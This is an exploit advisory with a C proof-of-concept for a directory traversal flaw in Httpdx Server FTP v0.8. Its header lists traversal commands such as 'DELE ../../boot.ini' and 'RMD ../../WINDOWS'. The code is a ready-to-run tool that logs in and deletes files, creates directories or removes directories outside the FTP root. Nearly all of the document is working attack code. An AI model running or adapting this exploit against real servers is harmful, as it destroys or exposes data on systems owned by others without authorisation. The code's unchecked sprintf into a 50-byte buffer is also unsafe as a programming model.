httpdx-ftp.txt
Posted on 08 June 2009
/* Httpdx Server FTP v0.8 Remote Arbitrary Directories & files Vulnerability ------------------------------------------------------------------------- Arbitrary: ---------- The vulnerability is caused due to an input validation error when processing FTP requests. This can be exploited to read, modify, or delete arbitrary files from the affected system via directory traversal attacks. -------------------------------------------------------------------------------------------------------- FTP Service: ------------ You can delet file boot.ini => DELE ../../boot.ini You can get file boot.ini => RETR ../../boot.ini You can creat Directory => MKD ../../poc You can delet Directory => RMD ../../WINDOWS Author: Jonathan Salwan Mail : submit [AT] shell-storm.org Web : http://www.shell-storm.org */ #include "stdio.h" #include "unistd.h" #include "stdlib.h" #include "sys/types.h" #include "sys/socket.h" #include "netinet/in.h" int syntax(char *file) { fprintf(stderr," Httpdx Server FTP v0.8 Arbitrary Directories & files "); fprintf(stderr,"------------------------------------------------------- "); fprintf(stderr,"=>Syntax : <%s> <ip> <port> <login> <passwd> <option> <argument_option> ",file); fprintf(stdout,"=>Option : -df Delet File "); fprintf(stdout," -cd Creat Directory "); fprintf(stdout," -dd Delet Directory "); fprintf(stdout,"=>Exemple : %s 127.0.0.1 21 login1 passwd2 -df ../../boot.ini ", file); fprintf(stdout," : %s 127.0.0.1 21 login1 passwd2 -cd ../../poc ", file); fprintf(stdout," : %s 127.0.0.1 21 login1 passwd2 -dd ../../WINDOWS ", file); exit(0); } int main(int argc, char **argv) { if (argc < 6) syntax(argv[0]); int port = atoi(argv[2]); int mysocket; int mysocket2; int srv_connect; int sockaddr_long; struct sockaddr_in sockaddr_mysocket; sockaddr_long = sizeof(sockaddr_mysocket); sockaddr_mysocket.sin_family = AF_INET; sockaddr_mysocket.sin_addr.s_addr = inet_addr(argv[1]); sockaddr_mysocket.sin_port = htons(port); char request[50]; char answer[100]; fprintf(stdout,"[+]Connect to Server %s ",argv[1]); mysocket2 = socket(AF_INET, SOCK_STREAM, 0); if(mysocket2 == -1){ fprintf(stderr,"[-]FAILED SOCKET "); return 1;} srv_connect = connect(mysocket2, (struct sockaddr*)&sockaddr_mysocket, sockaddr_long); if (srv_connect != -1) { memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); if(!strcmp(argv[5], "-df")){ sprintf(request, "USER %s ", argv[3]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request USER [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); } sprintf(request, "PASS %s ", argv[4]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "SYST "); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "DELE %s ", argv[6]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request DELE [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } } if(!strcmp(argv[5], "-cd")){ sprintf(request, "USER %s ", argv[3]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request USER [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); } sprintf(request, "PASS %s ", argv[4]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "SYST "); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "MKD %s ", argv[6]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request MKD [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } } if(!strcmp(argv[5], "-dd")){ sprintf(request, "USER %s ", argv[3]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request USER [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); } sprintf(request, "PASS %s ", argv[4]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "SYST "); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request PASS [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } sprintf(request, "RMD %s ", argv[6]); if (send(mysocket2,request,strlen(request),0) == -1){ fprintf(stderr,"[-]Send Request RMD [FAILED] "); shutdown(mysocket2,1); return 1;} else{ memset(answer,0,100); recv(mysocket2,answer,sizeof(answer),0); fprintf(stdout,"[+]>>%s",answer); } } } else{ fprintf(stderr,"[-]Connect [FAILED] "); shutdown(mysocket2,1); return 1;} shutdown(mysocket2,1); fprintf(stdout,"[+]Done! ", argv[5]); return 0; }
